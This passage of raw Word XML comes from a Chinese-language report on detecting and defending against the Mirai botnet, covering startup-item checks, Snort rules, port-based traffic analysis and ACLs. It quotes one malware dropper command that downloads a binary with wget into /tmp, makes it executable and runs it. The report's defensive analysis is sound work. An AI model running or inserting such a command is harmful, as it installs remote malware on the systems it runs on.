            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:id w:val="-745798873"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidRPr="009235AA">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidRPr="009235AA">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> </w:instrText>
          </w:r>
          <w:r w:rsidRPr="009235AA">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:instrText>CITATION Bad \l 2052</w:instrText>
          </w:r>
          <w:r w:rsidRPr="009235AA">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> </w:instrText>
          </w:r>
          <w:r w:rsidRPr="009235AA">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00B65ABC">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
              <w:noProof/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00B65ABC" w:rsidRPr="00B65ABC">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:noProof/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:t>[17]</w:t>
          </w:r>
          <w:r w:rsidRPr="009235AA">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidRPr="009235AA">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007E2F86" w:rsidRPr="007E2F86" w:rsidRDefault="007E2F86" w:rsidP="007E2F86">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="60" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007E2F86">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>cd /tmp;wget http://l.ocalhost.host/2;chmod 777 2;./2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009235AA" w:rsidRDefault="009235AA" w:rsidP="009235AA">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:ind w:left="420" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF5378">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>因此</w:t>
      </w:r>
      <w:r w:rsidR="007E2F86">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，检查服务器启动项也可作为</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF5378">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>一种鉴别手段方法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004C0B7D" w:rsidRPr="00CF5378" w:rsidRDefault="004C0B7D" w:rsidP="009235AA">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:ind w:left="420" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Fox-it给出了一个能用于检测感染的Snort</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> IDS规则</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:id w:val="-1102186593"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:instrText>CITATION len16 \l 2052</w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00B65ABC">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
              <w:noProof/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00B65ABC" w:rsidRPr="00B65ABC">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:noProof/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:t>[15]</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00757648" w:rsidRPr="00CF5378" w:rsidRDefault="00CF5378" w:rsidP="00CF5378">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF5378">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>可以通过流量分析的方式判断设备的异常</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF5378">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>。为</w:t>
      </w:r>
      <w:r w:rsidR="00D56D66" w:rsidRPr="00CF5378">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>鉴别一台设备是否被早期Mirai(23/2323)感染</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF5378">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF5378">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>可</w:t>
      </w:r>
      <w:r w:rsidR="00D56D66" w:rsidRPr="00CF5378">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>对TCP/23和TCP/2323的流量进行统计和</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF5378">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>分类</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:id w:val="-1867213095"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00D56D66" w:rsidRPr="00CF5378">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00D56D66" w:rsidRPr="00CF5378">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> CITATION Rol16 \l 2052 </w:instrText>
          </w:r>
          <w:r w:rsidR="00D56D66" w:rsidRPr="00CF5378">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00B65ABC">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
              <w:noProof/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00B65ABC" w:rsidRPr="00B65ABC">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:noProof/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:t>[1]</w:t>
          </w:r>
          <w:r w:rsidR="00D56D66" w:rsidRPr="00CF5378">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidRPr="00CF5378">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="00D56D66" w:rsidRPr="00CF5378">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>鉴别一台设备是否被变种Mirai(7547/5555)感染的方法包括</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF5378">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00757648" w:rsidRPr="000F6CCA">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>查看当前路由器是否开放了31517端口，是否关闭了7547端口</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:id w:val="-696841360"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00757648" w:rsidRPr="000F6CCA">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00757648" w:rsidRPr="000F6CCA">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> </w:instrText>
          </w:r>
          <w:r w:rsidR="00757648" w:rsidRPr="000F6CCA">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:instrText>CITATION 绿盟科16 \l 2052</w:instrText>
          </w:r>
          <w:r w:rsidR="00757648" w:rsidRPr="000F6CCA">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> </w:instrText>
          </w:r>
          <w:r w:rsidR="00757648" w:rsidRPr="000F6CCA">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00B65ABC">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
              <w:noProof/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00B65ABC" w:rsidRPr="00B65ABC">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:noProof/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:t>[11]</w:t>
          </w:r>
          <w:r w:rsidR="00757648" w:rsidRPr="000F6CCA">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidRPr="00CF5378">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>。31517端口的流量应该是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>SYN</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF5378">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>包，也有可能是HTTP，这一点需要进一步核实。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00757648" w:rsidRPr="00CF5378" w:rsidRDefault="00CF5378" w:rsidP="00CF5378">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF5378">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>由于</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF5378">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Mirai僵尸会对其他主机进行扫描，我们认为可以通过ISP的流量日志发现扫描行为，从而对Mirai僵尸进行定位。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A1AB3" w:rsidRDefault="00CE6432" w:rsidP="00CF5378">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc472191677"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如何进行防护</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w:rsidR="009A1AB3" w:rsidRPr="008E4800" w:rsidRDefault="00CE6432" w:rsidP="009A1AB3">
      <w:pPr>
        <w:ind w:firstLine="540"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E4800">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Abor给出的方案是</w:t>
      </w:r>
      <w:r w:rsidRPr="008E4800">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00046FD7" w:rsidRPr="008E4800">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>设备应</w:t>
      </w:r>
      <w:r w:rsidR="009A1AB3" w:rsidRPr="008E4800">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>实现</w:t>
      </w:r>
      <w:r w:rsidR="009A1AB3" w:rsidRPr="008E4800">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ACL，阻止</w:t>
      </w:r>
      <w:r w:rsidR="009A1AB3" w:rsidRPr="008E4800">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>high-port TCP 流量对TCP/23 和 TCP/2323的访问</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:id w:val="-532797583"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidRPr="008E4800">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidRPr="008E4800">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> CITATION Rol16 \l 2052 </w:instrText>
          </w:r>
          <w:r w:rsidRPr="008E4800">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00B65ABC">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
              <w:noProof/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00B65ABC" w:rsidRPr="00B65ABC">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:noProof/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:t>[1]</w:t>
          </w:r>
          <w:r w:rsidRPr="008E4800">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="003D31B3" w:rsidRPr="008E4800">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="003D31B3" w:rsidRPr="008E4800">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>从而有效防止原生Mirai的入侵</w:t>
      </w:r>
      <w:r w:rsidR="00757648" w:rsidRPr="008E4800">
